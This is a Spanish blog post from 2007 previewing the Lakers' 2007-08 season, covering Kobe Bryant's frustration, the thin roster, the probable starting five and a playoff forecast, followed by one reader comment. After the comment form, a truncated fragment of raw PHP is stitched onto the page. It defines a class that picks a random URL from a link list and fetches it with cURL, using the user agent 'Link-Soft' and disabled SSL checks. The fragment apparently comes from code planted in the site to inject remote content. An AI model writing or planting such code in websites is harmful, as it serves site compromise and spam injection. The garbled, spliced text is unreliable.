Los Angeles Lakers: amenaza tormenta

23 de September de 2007 por MagicJohnson32

logoDice la canción de Albert Hammond que nunca llueve en el sur de California. Hammond escribió la canción en 1972, año en el que los Lakers, liderados por Chamberlain, West y Goodrich, batieron el récord todavía vigente de victorias consecutivas en una temporada (33) y ganaron su primer anillo desde la mudanza de Minneapolis a Los Angeles. Así que puede que en 1972 no lloviese en el sur de California.

En otoño de 2007, sin embargo, amenaza tormenta.

Las declaraciones de un Kobe Bryant frustrado por la aparente apatía de los responsables de la franquicia crearon, pese a posteriores matizaciones, una situación de, como mínimo, inquietud. Mitch Kupchak, GM y principal damnificado por las palabras de Bryant, insistió en que los Lakers no traspasarán al jugador en ningún caso pero sigue sin mostrarse capaz de mejorar una plantilla limitadísima. No han llegado ni Garnett ni Jermaine (ni siquiera Marion, Artest o Jianlian), como en su día no llegaron Kidd, Boozer o cualquier otro nombre importante que haya sido vinculado a L.A.L. por los profesionales de la rumorología. El propio Phil Jackson ha respaldado las críticas de Bryant e incluso ha condicionado la ampliación de su contrato a la confección de un equipo competitivo. No le falta razón a Jackson cuando cuestiona el hecho de pagar 10 millones de dólares por temporada a un entrenador en un equipo sin aspiraciones como son los actuales Lakers. Jackson regresó a L.A. para ganar y se irá de L.A. si no dispone de los mimbres para lograrlo.

FisherActualmente, la materia prima apenas le da a Jackson para una clasificación para los Playoffs y una eliminación en primera ronda. Así fue en 2006 y así fue en 2007, en ambas ocasiones ante los Suns. Respecto al equipo que fue incapaz de ganar más de un partido a Nash & Co., Kupchak sólo ha logrado añadir un remiendo en el descosido puesto de base. Derek Fisher, desvinculado de los Jazz para jugar en una ciudad que dispusiese de un hospital en el que tratar a su hija de un tumor ocular, es la gran novedad de la plantilla. La elección de Javaris Crittenton, autor de una muy esperanzadora Summer League, y la presunta progresión de Jordan Famar en su segundo año ayudarán a elevar el pésimo rendimiento ofrecido por Smush Parker durante su último año en los Lakers.

Pero las renovaciones de Luke Walton (al alza y bien merecida, aunque no barata) y Chris Mihm (a la baja tras una temporada en blanco) completan todo el movimiento estival que Kupchack ha alcanzado a concretar. Por muy queridos que sean Fisher y Walton en el Staples, se presenta como un balance paupérrimo para una plantilla con tantas urgencias y carencias como las que tienen estos Lakers. La perspectiva para la afición de los Lakers, pese a recuperar las últimas dos temporadas la condición de equipo de playoffs y contar con el mejor entrenador posible y con la principal estrella del firmamento NBA, resulta del todo desalentadora de cara a la temporada 07-08.

Las esperanzas pasan, por tanto, por recordar la buena imagen ofrecida por el equipo en la eliminatoria contra los Suns de 2006 y en el inicio de la temporada pasada. Esta inercia positiva se cortó por las lesiones (134 partidos de baja entre Walton, Odom, Radmanovic, Cook y Kwame) y desde entonces los Lakers han ofrecido pocas señales de vida. El margen de mejora se concentra en los jóvenes, especialmente Bynum, otro de los objetivos de las críticas de Bryant. El pívot ha de empezar a ganarse la confianza que la franquicia le ha dado y parecerse al jugador dominante que se le intuye por momentos. Phil Jackson le ha criticado en más de una ocasión poniendo en duda su ética de trabajo y le ha relegado al banquillo dando la responsabilidad de pívot titular a Kwame Brown. Esta temporada se mantendrá la competencia por el puesto. El siempre cumplidor Turiaf volverá a aportar sus minutos de intensidad y Mihm, teóricamente recuperado de su grave lesión, podría llegar a hacerse con la titularidad si demuestra la forma y el juego que le llevó hace 2 años a firmar los mejores números de su carrera. Dado que Kwame y Mihm llegaron al training camp de octubre aún mermados tras someterse a sendas intervenciones quirúrgicas, es presumible que Bynum ocupe la plaza de titular, aunque habrá que ver si no le vuelve a suceder como en anteriores ocasiones y acaba hundido en las rotaciones.

Las incógnitas sobre el quinteto inicial se acaban ahí.

Derek Fisher será el base titular. El hombre del milagro, el de aquella canasta contra los Spurs, la de los 0.4 segundos, regresa al equipo que lo eligió en la primera ronda del draft del 96, como Kobe, para aportar lo que todos sabemos que puede aportar: inteligencia, tiro, sacrificio y el liderazgo que le concede su gran personalidad. Sufrirá, como siempre, ante bases rápidos, pero mejorará sin duda el papel realizado por Smush Parker y sería raro que, con el gran conocimiento del triángulo que atesora, perdiese la titularidad ante los jovencísimos Crittenton y Farmar.

Bynum Kobe OdomLuke Walton, con su gran contrato recién firmado bajo el brazo, y Lamar Odom repetirán como forwards. Jackson los necesita sanos ya que sus características se ven potenciadas en el triángulo ofensivo. Odom habrá de sobreponerse a todos los rumores que le han situado fuera de Los Angeles y añadir a sus siempre grandes estadísticas algo más de solidez. Le queda éste y otro año de contrato por un total cercano a los 30 millones de dólares y es hora de demostrar que merece la condición de segundo espada en un equipo con ciertas aspiraciones. Dice que quiere teminar su carrera en los Lakers y posiblemente esta temporada determinará hasta qué punto eso es posible. Walton, por su parte, apenas tendría minutos en cualquier otro equipo con cualquier otro entrenador. En cambio, en el sistema de Phil Jackson el hijo de Bill Walton puede exprimir unas cualidades cada vez menos comunes en la NBA. El Zen Master ha especulado con la posibilidad de emplear a Walton como sexto hombre, de modo que pueda liderar a una segunda unidad sin muchos recursos y carente de experiencia. Las rotaciones en los puestos de F les corresponden a Radmanovic (enorme decepción en su primera campaña en los Lakers tras firmar por la midlevel, perdido en el triángulo y que puso la guinda a su desastroso año mintiendo tras lesionarse mientras practicaba el snowboard), Brian Cook (que amplió su contrato por tres años pese a ciertos actos de indisciplina y una aportación que se limita al catch & shoot, recibir y lanzar, que tan bien se le da) y Evans (capaz de jugar con solvencia como escolta o alero).

bryantY, por último, Kobe Bryant. Lo escrito hasta ahora será papel mojado si Bryant se marcha. Todos los ojos estaban pendientes del inicio del training camp ya que se había especulado con que Bryant podría forzar la situación con su ausencia en Honolulu. Bryant se presentó en el media day, expresó su total implicación con el equipo y viajó a Hawaii para realizar la pretemporada, con lo que todo indicaba que completará la campaña de purple & gold. Más tarde, el doctor Buss reabrió la caja de los truenos con unas inoportunas e innecesarias declaraciones en las que aseguró que la franquicia escucharía ofertas por Bryant. Por momentos se dijo que el traspaso a los Bulls estaba hecho pero la temporada empezó con Bryant en los Lakers. Su papel en el equipo no variará: líder absoluto, centro de atención de los medios de comunicación y de las defensas rivales. Después de dos temporadas consecutivas logrando el título honorífico de máximo anotador y teniendo en cuenta sus críticas a los dirigentes de la franquicia es presumible que reduzca sus prestaciones ofensivas. En el Torneo de las Américas lideró el trabajo defensivo de la selección estadounidense. Los Lakers no pueden permitirse semejantes lujos así que, por el bien del equipo y de su objetivo de alcanzar de nuevo los Playoffs, Bryant debería volver a anotar como si le fuese la vida en ello siempre que la situación así lo exija, que será con frecuencia. Al menos los aficionados de los Lakers (y al baloncesto en general) seguirán teniendo motivos para ver a su equipo ante la previsión de nuevas gestas anotadoras por parte del #24.

Pero aunque Kobe vuelva a deslumbrar, por bien que jueguen Odom y Walton, por mucho que progrese Bynum, los Lakers no aspiran más que a primera o, como máximo, a segunda ronda de Playoffs. Eso salvo, claro, que Kupchak logre en su último año de contrato lo que no ha conseguido hasta ahora: mejorar la plantilla. Si no lo logra es muy posible que en los Lakers 2008-2009 no veamos ni a Kobe Bryant ni a Phil Jackson ni a (no todo es negativo) el propio Kupchak.

Probable quinteto: Derek Fisher, Kobe Bryant, Luke Walton, Lamar Odom y Andrew Bynum

Sexto hombre: Kwame Brown

Pronóstico: primera ronda de Playoffs

Comenta

Un comentario a esta entrada

  1. Elio dice:
    #1

    Como cambian las cosas, ¿eh? TODOS pensabamos que este año los Lakers serían un equipo del montón y en cambio iniciaron la temporada muy bien, liderando su conferencia en algunos momentos y luego llegó Gasol… A falta de un partido de Regular Season los Lakers están en primera posición del Oeste y son firmes candidatos al anillo como el que más.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>